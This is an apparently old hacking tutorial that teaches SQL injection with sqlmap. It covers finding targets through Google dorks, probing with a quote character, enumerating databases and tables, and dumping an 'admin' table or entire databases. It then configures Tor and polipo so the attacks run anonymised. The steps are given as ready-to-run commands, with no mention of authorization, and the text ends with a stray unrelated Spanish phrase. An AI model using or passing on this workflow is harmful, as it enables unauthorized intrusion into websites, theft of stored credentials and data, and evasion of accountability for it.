By Matrix http://www.twitter.com/TheAnonMatrix Required for use: Backtrack5 R1.

Start your Backtrack5 R1 (BT5) and start sqlmap, it can be found in /pentest/database/sqlmap/. Now lets get started! First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this: http://localhost.com/index.php?id=1337' Notice the ' here: ^ This should give you a pretty error and a good start! Lets open sqlmap! So the first you need to learn is options, or settings you have to apply in sqlmap. The base is: python sqlmap.py -u <website> With a website we would simply do it like this python sqlmap.py -u http://localhost/index.php?id=1337 (note we did not add the ' here) -u stands for Url and tells sqlmap THIS is our url. But we have to add more options for sqlmap to work: (note the following options use double dashes) --dbs to find DataBases --users to find users. python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --users (for the sake of lenght we will be assuming you used --dbs in this tutorial) After this command is ran you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do. Congratz! Should look like this: available databases [2]: [*] database1 [*] database2 Now to the fun part!

python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 This tells the program to find tables (--tables) in database (-D) names: database1. Once you execute this you will find (maybe) tons of tables. Locate the one you want...lets call it admin! python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin Now you should see the info of the table admin. But now we should be able to dump it! This can be done by --dump or --dump-all. Examples: python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 --dump-all python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump --dump dumps the selected tables content, --dump-all dumps EVERYTHING! But, we should be secure? Tor with SQLMAP: First find /etc/apt/sources.list open it and add deb http://deb.torproject.org/torproject.org lucid main Open the terminal and use this commandoes: gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add And now we need more commandos ran as root: apt-get update apt-get install tor tor-geoipdb apt-get install polipo Start tor: /etc/init.d/tor start grab the copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/buildscripts/config/polipo.conf Go to /etc/polipoconfig and replce the file with the one above. restart polipo: /etc/init.d/polipo restart Congratz! now you can run sqlmap with TOR! python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump -tor --random-agent Happy safe hacking!

Source: http://www.coresec.org/2011/04/24/sqlmap-with-tor/ https://www.torproject.org/docs/debian.html.en#ubuntu mi mama es guapa